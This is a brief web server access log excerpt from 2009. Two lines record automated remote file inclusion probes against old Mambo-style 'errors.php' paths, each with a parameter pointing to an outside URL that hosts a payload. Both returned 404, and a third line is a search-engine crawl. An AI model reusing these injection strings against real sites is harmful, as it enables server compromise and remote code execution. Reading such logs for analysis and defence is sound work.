82.146.33.206 - - [02/Mar/2009:10:02:45 -0800] "GET /logs/mambots/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
82.146.33.206 - - [02/Mar/2009:10:02:45 -0800] "GET /mambots/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
65.55.208.50 - - [02/Mar/2009:10:10:27 -0800] "GET /_private/?M=D HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
